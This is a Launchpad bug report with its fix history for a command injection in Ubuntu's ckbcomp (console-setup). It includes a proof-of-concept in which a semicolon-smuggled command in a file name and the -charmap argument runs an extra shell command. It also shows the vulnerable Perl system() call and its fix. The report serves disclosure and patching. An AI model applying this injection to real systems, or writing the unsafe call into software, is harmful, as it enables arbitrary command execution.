Ubuntu
console-setup package

command injection in ckbcomp

Bug #782705 reported by Emanuel Bronshtein
6
This bug affects 1 person
Affects Status Importance Assigned to Milestone
console-setup (Ubuntu)
Fix Released
Undecided
Unassigned

Bug Description

Binary package hint: console-setup

/usr/bin/ckbcomp have command injection bug .

test case :
root@emanuel-desktop:/tmp# touch "/etc/console-setup/compose.a;echo Systeminj;#.inc" "/usr/share/consoletrans/a;echo Systeminj;#.acm" "/tmp/CKB"
root@emanuel-desktop:/tmp# /usr/bin/ckbcomp "/tmp/CKB" -symbols "/tmp/CKB" -charmap "a;echo Systeminj;#"
WARNING: Can not find "" in "/tmp/CKB".
keymaps 0-127
strings as usual
cat: /etc/console-setup/compose.a: No such file or directory
Systeminj

the bug can be found at :

if ($charmap && -f "/etc/console-setup/compose.${charmap}.inc") {
    system("cat /etc/console-setup/compose.${charmap}.inc");
}

Revision history for this message
Emanuel Bronshtein (e3amn2l) wrote :

fix :
system("cat" , "/etc/console-setup/compose.${charmap}.inc");

Bryce Harrington (bryce)
Changed in console-setup (Ubuntu):
status: New → Fix Committed
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package console-setup - 1.70ubuntu4

---------------
console-setup (1.70ubuntu4) precise; urgency=low

  * Add definitions for four (ignored) dead-keys: dead_belowcomma,
    dead_currency, dead_doublegrave, and dead_invertedbreve. Cherrypick
    from Debian git.
    (LP: #738314)
  * Fix command injection in ckbcomp (thanks to Emanuel Bronshtein)
    (LP: #782705)
 -- Bryce Harrington <email address hidden> Mon, 19 Mar 2012 21:13:39 -0700

Changed in console-setup (Ubuntu):
status: Fix Committed → Fix Released
To post a comment you must log in.
This report contains Public information  
Everyone can see this information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.